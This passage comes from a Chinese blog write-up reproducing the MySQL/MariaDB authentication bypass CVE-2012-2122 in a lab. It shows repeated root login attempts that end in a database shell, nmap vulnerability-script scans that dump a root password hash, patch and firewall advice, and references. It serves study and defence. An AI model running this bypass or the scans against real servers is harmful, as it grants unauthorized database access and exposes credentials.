    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    
    Welcome to the MariaDB monitor.  Commands end with ; or g.
    Your MySQL connection id is 2697
    Server version: 5.5.23 Source distribution
    
    Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
    
    Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.
    
    MySQL [mysql]> 
    

     4、nmap script(mysql-vuln-cve2012-2122):

    root@kali:~# nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 192.168.118.130
    
    Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:07 CST
    Nmap scan report for bogon (192.168.118.130)
    Host is up (0.00033s latency).
    PORT     STATE SERVICE VERSION
    3306/tcp open  mysql   MySQL 5.5.23
    | mysql-vuln-cve2012-2122: 
    |   VULNERABLE:
    |   Authentication bypass in MySQL servers.
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2012-2122
    |       When a user connects to MariaDB/MySQL, a token (SHA
    |       over a password and a random scramble string) is calculated and compared
    |       with the expected value. Because of incorrect casting, it might've
    |       happened that the token and the expected value were considered equal,
    |       even if the memcmp() returned a non-zero value. In this case
    |       MySQL/MariaDB would think that the password is correct, even while it is
    |       not.  Because the protocol uses random strings, the probability of
    |       hitting this bug is about 1/256.
    |       Which means, if one knows a user name to connect (and "root" almost
    |       always exists), she can connect using *any* password by repeating
    |       connection attempts. ~300 attempts takes only a fraction of second, so
    |       basically account password protection is as good as nonexistent.
    |       
    |     Disclosure date: 2012-06-9
    |     Extra information:
    |       Server granted access at iteration #1500
    |   
    |     root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    |   
    |     References:
    |       http://seclists.org/oss-sec/2012/q2/493
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
    |_      https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    MAC Address: 00:0C:29:25:90:3B (VMware)
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
    

    -d选项来查看debug信息,查看具体的信息如下:

    root@kali:~# nmap -sV -T4 -p3306  -d  --script=mysql-vuln-cve2012-2122 192.168.118.130
    
    Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:13 CST
    --------------- Timing report ---------------
      hostgroups: min 1, max 100000
      rtt-timeouts: init 500, min 100, max 1250
      max-scan-delay: TCP 10, UDP 1000, SCTP 10
      parallelism: min 0, max 0
      max-retries: 6, host-timeout: 0
      min-rate: 0, max-rate: 0
    ---------------------------------------------
    NSE: Using Lua 5.3.
    NSE: Arguments from CLI: 
    NSE: Loaded 41 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Initiating ARP Ping Scan at 16:13
    Scanning 192.168.118.130 [1 port]
    Packet capture filter (device eth0): arp and arp[18:4] = 0x000C29A8 and arp[22:2] = 0x84F5
    Completed ARP Ping Scan at 16:13, 0.03s elapsed (1 total hosts)
    Overall sending rates: 29.01 packets / s, 1218.42 bytes / s.
    mass_rdns: Using DNS server 192.168.118.2
    Initiating Parallel DNS resolution of 1 host. at 16:13
    mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
    Completed Parallel DNS resolution of 1 host. at 16:13, 0.00s elapsed
    DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating SYN Stealth Scan at 16:13
    Scanning bogon (192.168.118.130) [1 port]
    Packet capture filter (device eth0): dst host 192.168.118.128 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.118.130)))
    Discovered open port 3306/tcp on 192.168.118.130
    Completed SYN Stealth Scan at 16:13, 0.04s elapsed (1 total ports)
    Overall sending rates: 23.44 packets / s, 1031.36 bytes / s.
    Initiating Service scan at 16:13
    Scanning 1 service on bogon (192.168.118.130)
    Completed Service scan at 16:13, 0.00s elapsed (1 service on 1 host)
    NSE: Script scanning 192.168.118.130.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 16:13
    NSE: Starting mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #1
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #2
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #3
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #4
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #5
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #6
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #7
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #8
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #9
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #10
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #11
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #12
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #13
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #14
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #15
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #16
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #17
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #18
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #19
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #20
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #21
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #22
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #23
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #24
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #25
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #26
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #27
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #28
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #29
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #30
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #31
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #32
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #33
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #34
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #35
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #36
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #37
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #38
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #39
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #40
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #41
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #42
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #43
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #44
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #45
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #46
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #47
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #48
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #49
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #50
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #51
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #52
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #53
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #54
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #55
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #56
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #57
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #58
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #59
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #60
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #61
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #62
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #63
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #64
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #65
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #66
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #67
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #68
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #69
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #70
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #71
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #72
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #73
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #74
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #75
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #76
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #77
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #78
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #79
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #80
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #81
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #82
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #83
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #84
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #85
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #86
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #87
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #88
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #89
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #90
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #91
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #92
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #93
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #94
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #95
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #96
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #97
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #98
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #99
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #100
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #101
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #102
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #103
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #104
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #105
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #106
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #107
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #108
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #109
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #110
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #111
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #112
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #113
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #114
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #115
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #116
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #117
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #118
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #119
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #120
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #121
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #122
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #123
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #124
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #125
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #126
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #127
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #128
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #129
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #130
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #131
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #132
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #133
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #134
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #135
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #136
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #137
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #138
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #139
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #140
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #141
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #142
    NSE: Finished mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
    Completed NSE at 16:13, 0.42s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Nmap scan report for bogon (192.168.118.130)
    Host is up, received arp-response (0.00068s latency).
    Scanned at 2018-08-29 16:13:26 CST for 1s
    PORT     STATE SERVICE REASON         VERSION
    3306/tcp open  mysql   syn-ack ttl 63 MySQL 5.5.23
    | mysql-vuln-cve2012-2122: 
    |   VULNERABLE:
    |   Authentication bypass in MySQL servers.
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2012-2122
    |       When a user connects to MariaDB/MySQL, a token (SHA
    |       over a password and a random scramble string) is calculated and compared
    |       with the expected value. Because of incorrect casting, it might've
    |       happened that the token and the expected value were considered equal,
    |       even if the memcmp() returned a non-zero value. In this case
    |       MySQL/MariaDB would think that the password is correct, even while it is
    |       not.  Because the protocol uses random strings, the probability of
    |       hitting this bug is about 1/256.
    |       Which means, if one knows a user name to connect (and "root" almost
    |       always exists), she can connect using *any* password by repeating
    |       connection attempts. ~300 attempts takes only a fraction of second, so
    |       basically account password protection is as good as nonexistent.
    |       
    |     Disclosure date: 2012-06-9
    |     Extra information:
    |       Server granted access at iteration #1500
    |   
    |     root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    |   
    |     References:
    |       http://seclists.org/oss-sec/2012/q2/493
    |       https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
    MAC Address: 00:0C:29:25:90:3B (VMware)
    Final times for host: srtt: 677 rttvar: 3967  to: 100000
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Read from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-service-probes nmap-services.
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds
               Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
    root@kali:~# 
    

    四、漏洞修复建议

    升级官方补丁: 
    MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23  
    MySQL 5.1.63, 5.5.24, 5.6.6 
    Sebug临时解决办法:  
    在防火墙上关闭mysql端口

    参考:

    http://www.freebuf.com/vuls/3815.html

    http://blog.51cto.com/linuxgeek/998210

    https://www.exploit-db.com/exploits/19092/

    https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122

    https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/

    Next:

    1、分析mysql源码  http://blog.51cto.com/linuxgeek/998210进一步的学习

    2、分析nmap、metasploit脚本提高脚本编写能力

    3、漏洞环境复现,目前在官方下载了对应有漏洞的mysql版本并安装在Windows下,但是并没有复现成功!

  • 相关阅读:
    2822 爱在心中
    P1707 刷题比赛
    1269 匈牙利游戏
    1482 路线统计
    Codevs 1287 矩阵乘法&&Noi.cn 09:矩阵乘法(矩阵乘法练手题)
    P2022 有趣的数
    1087 麦森数
    P1111 修复公路
    python为在线漫画站点自制非官方API(未完待续)
    逻辑运算0==x和x==0具体解释
  • 原文地址:https://www.cnblogs.com/zhuxr/p/9553541.html
Copyright © 2011-2022 走看看